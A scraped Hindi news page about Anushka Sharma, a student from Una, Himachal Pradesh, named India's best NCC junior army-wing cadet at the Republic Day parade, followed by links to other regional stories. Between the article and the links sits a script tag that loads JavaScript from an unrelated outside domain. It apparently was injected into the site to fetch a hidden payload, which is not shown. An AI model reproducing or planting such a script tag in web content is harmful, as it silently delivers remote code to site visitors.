<p>जिला ऊना के जवाहर नवोदय विद्यालय पेखूबेला की 9वीं कक्षा की छात्रा कैडेट अनुष्का शर्मा को गणतंत्र दिवस परेड में आर्मी विंग (जूनियर) वर्ग में भारत की सर्वश्रेष्ठ एनसीसी कैडेट घोषित किया गया है। प्रधानमंत्री नरेंद्र मोदी द्वारा परेड मैदान में आयोजित प्रधानमंत्री रैली में यह प्रतिष्ठित स्वर्ण पदक अनुष्का ने सम्मान के साथ प्राप्त किया। अनुष्का के पिता हिमाचल प्रदेश सरकार के शिक्षा विभाग में लेक्चरर तथा माता जवाहर नवोदय विद्यालय में बतौर टीजीटी अपनी सेवाएं दे रहे हैं।</p>
<p>एनसीसी में गणतंत्र दिवस परेड के लिए अनुष्का का प्रशिक्षण 6 हि० प्र० स्वतंत्र वाहिनी एनसीसी ऊना के अंतर्गत प्राप्त हुआ। 6 हि० प्र० स्वतंत्र वाहिनी एनसीसी ऊना के कमानाधिकारी कर्नल संकेत देओ ने बताया कि अनुष्का एक बहुत ही होनहार, सराहनीय तथा हर क्षेत्र में उत्कृष्ट प्रदर्शन करने वाली कैडेट है। विनम्र पृष्ठभूमि तथा ऊना जैसे छोटे शहर से सम्बंधित होते हुए भी अनुष्का की यह राष्ट्रीय उपलब्धि इलाके के बाकी एन सी सी कैडेटों के लिए अनुकरणीय प्रेरणा स्त्रोत है। सही मायने में अनुष्का ने यह गौरव हासिल कर के हिमचल की बेटियों का नाम राष्ट्रीय स्तर पर रोशन किया है।</p>
<p> </p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
Tragic Road Accident in Sirmour; सिरमौर जिले के पांवटा साहिब की तहसील में आंज भोज…
Mumbai: अजित पवार गुट के NCP नेता और पूर्व विधायक बाबा सिद्दीकी की शनिवार रात…
Kullu Dussehra Begins: राज्यपाल शिव प्रताप शुक्ल ने रविवार को कुल्लू के रथ मैदान में…
International Kullu Dussehra: जिला कुल्लू के मुख्यालय ढालपुर मैदान में आज से अंतरराष्ट्रीय दशहरा उत्सव…
विपल्व सकलानी English medium education in Himachal; हिमाचल प्रदेश के सरकारी स्कूलों में पढ़ाई का…
Kevin Pietersen India visit; इंग्लैंड के पूर्व स्टार बल्लेबाज केविन पीटरसन ने भारतीय क्रिकेट प्रेमियों…